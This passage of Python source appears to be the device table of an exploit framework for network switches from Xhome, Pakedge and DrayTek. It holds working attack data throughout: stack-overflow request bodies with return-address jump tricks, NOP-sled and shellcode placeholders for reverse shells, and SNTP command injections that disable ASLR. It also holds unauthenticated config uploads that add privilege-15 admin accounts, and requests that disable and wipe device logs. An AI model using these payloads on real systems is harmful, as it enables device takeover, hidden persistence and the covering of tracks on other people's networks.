(PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/security.cgi?login',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/security.cgi?logout',\r\n\t\t\t\t\t\t'query':'build=NOP&heap=NOP&to=NOP&higher=addresses&usr=admin&pswrd=_PWDNOP_RA_START&shellcode=_USRNOP_SHELLCODE',\r\n\t\t\t\t\t\t'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Xhome': {\r\n\t\t\t\t'vendor': 'Xhome',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=5121',\r\n\t\t\t\t\t\t'status':'',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_5132=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_5132=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'&login=1&_CMD_',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'sys_ping_post_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Pakedge': { \r\n\t\t\t\t'vendor': 'Pakedgedevice & Software Inc',\r\n\t\t\t\t'uri':'https://www.pakedge.com/products/switches/family/index.php',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&empty=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_global',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"_ds=1&target=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_clear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"_ds=1&target=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_saverun_cfg',\r\n\t\t\t\t\t\t\t'content':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'content_check':'/var/config/running-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'2',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=139&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'DrayTek': { \r\n\t\t\t\t'vendor': 'DrayTek Corp.',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak': True,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': 